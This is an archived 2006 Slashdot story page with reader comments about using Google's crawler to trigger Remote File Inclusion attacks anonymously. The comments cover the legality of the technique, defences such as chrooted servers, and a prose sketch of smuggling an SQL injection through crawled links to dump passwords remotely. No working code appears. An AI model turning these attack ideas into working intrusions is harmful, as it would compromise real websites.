Anonymizing RFI Attacks Through Google

← Back to Stories (view on slashdot.org)

Anonymizing RFI Attacks Through Google

Posted by ryuzaki0 on Thursday November 23, 2006 @01:37AM from the anonymizing-isn't-in-my-spellchecker dept.

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

18 of 66 comments (clear)

Min score:

Reason:

Sort:

but is it a crime... by Sensor · 2006-11-23 01:48 · Score: 5, Interesting

There is actually quite an interesting aside to this, would someone who used this technique actually be guilty of hacking? Afterall they don't run the exploit and arguably can't guarentee that anyone will.

If I happen to create a utility capable of cracking a site but then store it for research, never distribute and never actively use then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present its only the person who actively uses it that is guilty of a crime.

However, in this scenario (even if I could be traced) its arguable that *I* never attacked a site, all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent ammendment to the UKs computer misuse act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

As always it comes down to people...

PS:
Aas an aside I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 amazon voucher) then please take a look at:

https://msc-survery.priogenus.com/amazon.php
1. Re:but is it a crime... by MartinJW · 2006-11-23 01:53 · Score: 2, Interesting
  
  I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?
2. Re:but is it a crime... by Sensor · 2006-11-23 02:04 · Score: 2, Interesting
  
  Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?
3. Re:but is it a crime... by Not_Wiggins · 2006-11-23 02:33 · Score: 2, Insightful
  
  but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion...
  
  I'll preface this by saying IANAL...
  Prove? No. Provide circumstancial evidence? Yup.
  
  As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.
  
  Maybe it doesn't seem as clear-cut because we're "just talking about words."
  
  But the web provides action to words, real things that can happen based on materials produced. So, if we put the question within a different context, maybe the "crime" part becomes more apparent:
  
  How you you feel about a nuclear materials researcher leaving weapons grade plutonium in an unlocked box in his back yard while posting a notice in the local paper that such material exists unprotected for anyone to harvest? Would he be making the bomb himself and destroying people with it? No. Would it be tantamount to such an act? Yes.
  
  I don't know how it would be prosecuted, but there's no doubt that it would be.
  
  I think the reason there's even question of legality to these types of attacks isn't because the moral implications are ambiguous, but because the law hasn't been able to keep up with the latest in cybercrime.
  
  --
  Diplomacy is the art of saying, "Nice doggie!" until you can find a rock.
4. Re:but is it a crime... by Opie812 · 2006-11-23 04:20 · Score: 2, Funny
  
  as someone who's father actually is a vicar...
  
  Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:
  
  My father's a vicar you insensitive clod!
  
  :)
  
  --
  I'm not a nerd. Nerds are smart.
Anonymous? by tttonyyy · 2006-11-23 01:49 · Score: 3, Informative

Aside from triggering the attack, how does this make it anonymous?

Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).

--
biopowered.co.uk - catalytically cracking triglycerides for home automotive use since 2008. Just say no to big oil!
1. Re:Anonymous? by Zedrick · 2006-11-23 02:01 · Score: 3, Informative
  
  Yes, but the URI-with-malicious-code is usually something like: http://www.geocities.com/xxxxxxx/xxx.txt
  
  At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).
change behaviour for bots by cucucu · 2006-11-23 01:50 · Score: 4, Informative

In your server, you can code the logic to take another action if the user agent is a bot.
Here you have a db of web robots.
In reality... by lpiob · 2006-11-23 01:50 · Score: 2, Insightful

It's a feature, not a bug.
How not Who by MartinJW · 2006-11-23 01:56 · Score: 5, Informative

If your web application is vulnerable to attack then I would have thought it makes no difference where that attack comes from - be it a 'real' person or a search bot. You should spend more time worrying about whether your application is secure, the how is more important than the who.
1. Re:How not Who by deryckh · 2006-11-23 02:17 · Score: 2, Interesting
  
  Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.
Re:RFI by Anonymous Coward · 2006-11-23 02:03 · Score: 2, Informative

Nice explanation here.
Remote File Inclusion by Bogtha · 2006-11-23 02:03 · Score: 4, Informative

Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.

--
Bogtha Bogtha Bogtha
RFI? How about defining this? by Ashtead · 2006-11-23 02:14 · Score: 5, Informative

Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?
How about explaining what such an ambigious acronym actually means initially. As neither TFA nor the summary seems to have done so, I therefore will have do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On Page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.
How about that.
I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?

--
SIGBUS @ NO-07.308
1. Re:RFI? How about defining this? by hey! · 2006-11-23 04:53 · Score: 3, Informative
  
  I'm guessing from the text of the article it is Remote File Inclusion.
  
  The description of the mechanism doesn't really makes sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.
  
  Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.
  
  So, suppose you have a malicious SQL injection attack that causes your database dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either because its not a transaction.
  
  --
  Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
2. Re:RFI? How about defining this? by Fatalis · 2006-11-23 08:30 · Score: 2, Funny
  
  Yes, WTF is a TLA.
  
  --
  Deus est fatalis
Simple solution by vivekg · 2006-11-23 02:32 · Score: 4, Interesting

Seriously, I hate to read article like this one. They don't offer any solution.....this kind of attacks are not new at all, you can find tons of such attacks from access.log file/p> tail -f /var/log/httpd/access.log
First get rid of fat apache and use like small and secure lighttpd if you are running a *small personal* web site. Second put lighttpd / Apache in chrooted jail and no one can install *php/perl* shell. I have documented the procedure for putting lighttpd in jail:
http://www.cyberciti.biz/tips/howto-setup-lighttpd -php-mysql-chrooted-jail.html
Both yahoo and google runs entire webserver in chrooted jail. Other choice is use OpenBSD which runs Apache in chrooted jail out of box.

--
The important thing is not to stop questioning --Albert Einstein.
Glasshouses... by ArsenneLupin · 2006-11-23 04:08 · Score: 2, Informative

... The Daily WTF runs on ASPX. These are bold people. Very bold people.